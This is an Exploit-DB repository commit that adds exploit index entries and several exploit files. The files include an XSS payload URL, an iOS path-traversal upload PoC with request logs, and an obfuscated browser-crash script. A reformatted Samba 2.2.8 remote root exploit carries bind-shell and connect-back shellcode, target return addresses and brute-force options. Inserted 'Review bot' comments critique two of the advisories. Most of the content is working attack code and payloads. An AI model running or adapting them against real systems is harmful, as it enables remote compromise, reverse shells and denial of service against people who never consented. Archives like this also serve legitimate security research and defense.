DB: 2015-05-19

19 new exploits
Offensive Security 2015-05-19 05:03:23 +00:00
parent 2be48e03b5
commit 6086516a4d
21 changed files with 1099 additions and 213 deletions


@ -9,6 +9,7 @@ id,file,description,date,author,platform,type,port
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
37060,platforms/windows/dos/37060.html,"Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0
11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
@ -33419,3 +33420,21 @@ id,file,description,date,author,platform,type,port
37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting Vulnerability",2012-04-02,"Dawid Golak",java,webapps,0 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting Vulnerability",2012-04-02,"Dawid Golak",java,webapps,0
37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0
37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 Denial of Service Vulnerability",2012-03-31,r45c4l,linux,dos,0
37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 'index/' Cross Site Scripting Vulnerability",2012-04-03,b.saleh,hardware,remote,0
37038,platforms/php/webapps/37038.txt,"osCMax 2.5 admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37039,platforms/php/webapps/37039.txt,"osCMax 2.5 admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37040,platforms/php/webapps/37040.txt,"osCMax 2.5 admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37041,platforms/php/webapps/37041.txt,"osCMax 2.5 admin/stats_products_purchased.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37042,platforms/php/webapps/37042.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37043,platforms/php/webapps/37043.txt,"osCMax 2.5 admin/stats_customers.php sorted Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37044,platforms/php/webapps/37044.txt,"osCMax 2.5 admin/information_manager.php information_id Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37045,platforms/php/webapps/37045.txt,"osCMax 2.5 admin/geo_zones.php zID Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80
37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80
37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080
37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF Vulnerability",2015-05-18,"Akash S. Chavan",windows,webapps,0



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/52881/info
Peakflow SP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/index/"onmouseover="alert(666)

216
platforms/ios/webapps/37057.txt Executable file

@ -0,0 +1,216 @@
Document Title:
===============
Wireless Photo Transfer v3.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1492
Release Date:
=============
2015-05-12
Vulnerability Laboratory ID (VL-ID):
====================================
1492
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Transfer your photo without usb. The best wireless photo transfer app on the App Store.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application.
Vulnerability Disclosure Timeline:
==================================
2015-05-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Yan Xing
Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject
own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application.
The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker
is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit
the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack
vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Submit (Upload)
Vulnerable Parameter(s):
[+] filename (album-title)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: #1 Index File Dir Listing (album-title)
<div class="album-folder">
<div class="album-number">2 items</div>
<div class="album-title">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a></a></div><a>
</a><a href="/group/2/0/100"><img class="album-overlay" alt="" src="/cvab-overlay.png" height="160" width="140">
<img class="album-thumb" alt="" src="/api/group/poster/2" height="90" width="90"></a>
<div class="album-folder-img"><img alt="" src="/cvab.png" height="160" width="140"></div>
</div>
PoC: #2 Topic Album (Album Title - album_info_intro_driver)
<div class="top-section">
<div id="intro">
<div class="divider">
<h1 class="strong" id="album_info_intro_driver">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a>(0-2)</a></h1><a>
<div class="pagination"></div>
</a></div><a>
</a></div><a>
</a><div class="centered"><a>
</a><a class="button-2 ui-glossy rad-l" href="javascript:location.reload(true)">Refresh</a>
<a class="button-2 ui-glossy rad-r" href="javascript:downloadAllSelection()">Download ZIP</a>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:80/upload.html
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/groups]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------8397114799830
Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:80/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[210]
Connection[keep-alive]
Date[Sat, 09 May 2015 15:21:30 GMT]
Reference(s):
http://localhost:80/groups
http://localhost:80/upload.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync.
Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output
values in the mobile wifi interface (file dir) application.
Security Risk:
==============
The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
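Review bot: The severity fields contradict each other: the CVSS line under "Common Vulnerability Scoring System" and the "Security Risk" section both give 6.5, which falls in the Medium band, while the "Severity Level" section and the same "Security Risk" sentence call it High; one of the two should be corrected so the index entry carries a consistent rating. The evidence in the PoC sections (the two `../[LOCAL FILE INCLUDE ...]` album-title fragments and the multipart `filename=` in the POST log) shows a `../`-prefixed upload filename being rendered verbatim inside the `album-title` markup, which demonstrates missing output encoding of the filename rather than a file actually being read from outside the album directory; unless a response showing such a read is added, the title and the "file include" classification overstate what is shown. The "Solution - Fix & Patch" section already describes the appropriate mitigation (reject path separators in upload filenames server-side and encode the value on output), and naming the issue accordingly would make that section and the title agree.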

13
platforms/linux/dos/37036.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/52856/info
Flock is prone to a denial-of-service vulnerability.
Successful exploits will consume excessive resources and will eventually crash the application and possibly the underlying computer, effectively denying service to legitimate users.
Flock 2.6.1 is vulnerable; other versions may also be affected.
<script type="text/javascript">
<!--
document.write(unescape('%3c%68%74%6d%6c%3e%0d%0a%3c%74%69%74%6c%65%3e%4f%6f%70%73%20%75%72%20%62%72%6f%77%73%65%72%20%6a%75%73%74%20%64%69%65%64%20%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%66%75%6e%63%74%69%6f%6e%20%46%54%42%28%29%0d%0a%20%7b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%31%34%31%25%75%34%31%34%31%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%32%34%32%25%75%34%32%34%32%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%34%34%34%25%75%34%34%34%34%22%29%3b%0d%0a%20%20%20%20%66%6f%72%28%69%3d%30%3b%20%69%20%3c%3d%20%31%30%30%20%3b%20%2b%2b%69%29%0d%0a%20%7b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%
66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%20%20%20%20%7d%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%20%6f%6e%4c%6f%61%64%3d%22%46%54%42%28%29%22%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e'));
//-->
</script>
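Review bot: The whole PoC body is a single percent-encoded `unescape()` argument on the `document.write` line, so nothing in the file states in plain text what the script does and anyone triaging it has to decode the blob first. A one-line comment before the `<script>` tag, e.g. `<!-- decodes to a page whose onLoad handler repeatedly doubles strings and document.write()s them (resource exhaustion described above) -->`, would make the file self-describing and tie it to the prose at the top. The blob is also shown wrapped onto a second line here; if that break is in the stored file rather than the viewer, the single-quoted string literal is split and the script will not parse.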


@ -92,8 +92,7 @@ pid_t childs[100];
struct sockaddr_in addr1; struct sockaddr_in addr1;
struct sockaddr_in addr2; struct sockaddr_in addr2;
char char linux_bindcode[] =
linux_bindcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
@ -108,8 +107,7 @@ linux_bindcode[] =
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
char char bsd_bindcode[] =
bsd_bindcode[] =
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
@ -124,8 +122,7 @@ bsd_bindcode[] =
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
"\xeb\x9a"; "\xeb\x9a";
char char linux_connect_back[] =
linux_connect_back[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
@ -136,8 +133,7 @@ linux_connect_back[] =
"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80"; "\x01\xcd\x80";
char char bsd_connect_back[] =
bsd_connect_back[] =
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
"\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
@ -153,52 +149,30 @@ struct {
char *type; char *type;
unsigned long ret; unsigned long ret;
char *shellcode; char *shellcode;
int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */
stack */
} targets[] = { } targets[] = {
{ "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 },
{ "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 },
0 }, { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 },
0 }, { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 },
0 }, { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 },
{ "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 },
0 }, { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 },
{ "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 },
0 }, { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 },
{ "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 },
0 }, { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 },
{ "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 },
0 },
{ "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode,
0 },
{ "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode,
1 },
{ "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode,
1 },
{ "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode,
1 },
{ "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode,
1 },
{ "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode,
2 },
{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,
2 },
{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,
2 },
{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,
2 },
{ "Crash (All platforms) ", 0xbade5dee, linux_bindcode,
0 },
}; };
void shell(); void shell();
@ -213,18 +187,14 @@ int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode); int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode); int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);
void void usage(char *prog)
usage(char *prog)
{ {
fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
"-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/Net "-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
"-B <step> bruteforce steps (default = 300)\n" "-B <step> bruteforce steps (default = 300)\n"
"-c <ip address> connectback ip address\n" "-c <ip address> connectback ip address\n"
"-C <max childs> max childs for scan/bruteforce mode (d "-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"
efault = 40)\n" "-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)\n"
"-d <delay> bruteforce/scanmode delay in micro sec
onds (default = 100000)\n"
"-f force\n" "-f force\n"
"-p <port> port to attack (default = 139)\n" "-p <port> port to attack (default = 139)\n"
"-r <ret> return address\n" "-r <ret> return address\n"
@ -236,8 +206,7 @@ onds (default = 100000)\n"
exit(1); exit(1);
} }
int int is_samba(char *ip, unsigned long time_out)
is_samba(char *ip, unsigned long time_out)
{ {
char char
nbtname[]= /* netbios name packet */ nbtname[]= /* netbios name packet */
@ -290,10 +259,8 @@ is_samba(char *ip, unsigned long time_out)
ptr -= 19; ptr -= 19;
if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 & if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
& *(ptr + 3) == 0x00 && *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
*(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 &
& *(ptr + 6) == 0x00) {
close(s); close(s);
return 0; return 0;
} }
@ -310,8 +277,7 @@ is_samba(char *ip, unsigned long time_out)
return -1; return -1;
} }
int int Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
{ {
/* ripped from no1 */ /* ripped from no1 */
@ -360,8 +326,7 @@ Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
} }
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
meout);
if(select_status == 0) { if(select_status == 0) {
close(fd); close(fd);
@ -379,8 +344,7 @@ meout);
{ {
getsockopt_length = sizeof(getsockopt_error); getsockopt_length = sizeof(getsockopt_error);
